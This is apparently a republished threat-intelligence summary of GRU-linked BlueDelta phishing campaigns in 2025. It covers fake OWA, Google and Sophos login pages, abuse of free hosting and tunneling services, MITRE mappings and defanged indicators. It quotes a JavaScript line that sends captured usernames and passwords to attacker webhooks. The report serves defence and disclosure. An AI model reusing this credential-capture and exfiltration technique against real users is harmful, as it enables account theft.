Threat Research

GRU-Linked BlueDelta Evolves Credential Harvesting

RecordedFuture
GRU-Linked BlueDelta Evolves Credential Harvesting

Recorded Future’s Insikt Group tracked BlueDelta credential-harvesting campaigns from February to September 2025 that impersonated Microsoft OWA, Google, and Sophos VPN portals and abused free hosting and tunneling services to capture and exfiltrate credentials. The campaigns targeted researchers and policy-linked organizations—using legitimate PDF lures, customized JavaScript for input capture and redirection to real sites to reduce detection and suspicion. #BlueDelta #MicrosoftOWA

Keypoints

  • BlueDelta (GRU-associated) expanded credential-harvesting operations across 2025, deploying OWA-, Google-, and Sophos-themed phishing pages.
  • The group abused free hosting and tunneling services (Webhook[.]site, InfinityFree, Byet Internet Services, ngrok, ShortURL) to host phishing pages, relay data, and manage redirections.
  • Campaigns used legitimate PDF lure documents from organizations like the Gulf Research Center and the EcoClimate Foundation to enhance realism and evade email security controls.
  • JavaScript-based input-capture and beaconing mechanisms collected usernames, passwords, URL-embedded target identifiers, IPs, and user agents before redirecting victims to legitimate sites.
  • Targets included individuals and organizations in Türkiye, Europe, North Macedonia, and Uzbekistan, indicating a focus on energy, research, defense cooperation, and government communications.
  • BlueDelta’s multi-stage redirection and reuse of disposable services demonstrate low-cost, stealthy tradecraft likely to continue into early 2026.

MITRE Techniques

  • [T1593 ] Search Open Websites/Domains – Used OSINT and targeted email discovery to identify victims and target addresses (‘Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank’).
  • [T1583.006 ] Acquire Infrastructure: Web Services – Abused free web services and hosting providers to host phishing pages and exfiltration endpoints (‘abused free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok’).
  • [T1056.002 ] Input Capture: GUI Input Capture – Captured credentials via browser-based JavaScript functions that sent usernames and passwords to attacker-controlled webhooks (‘JavaScript function used to send username and password to the attacker webhook before redirecting to the GRC PDF file’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Exfiltrated harvested data using HTTP POST requests over web protocols (‘xhr.send(JSON.stringify({“username”: username, “oldPwd”: oldPwd}));’).
  • [T1102 ] Web Service – Leveraged third-party web services and APIs (Webhook[.]site, ngrok) to host content and relay stolen credentials (‘BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns’).

Indicators of Compromise

  • [Domains ] Hosting and phishing infrastructure – account-security-googie[.]my-board[.]org, config-settings[.]kesug[.]com, and 4 more domains associated with free hosting services.
  • [IP Addresses ] Hosting/resolution context – 172[.]111[.]206[.]103 (associated hosting), 185[.]27[.]134[.]125 (InfinityFree-resolved UK IP).
  • [URLs ] Credential pages, webhooks, and exfiltration endpoints – hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, hxxps://d3ef-2804-37f8-400-2cbf-4996-e46a-4802-5c08[.]ngrok-free[.]app, and 9 other URLs used for phishing, redirection, and data capture.

Read more: https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting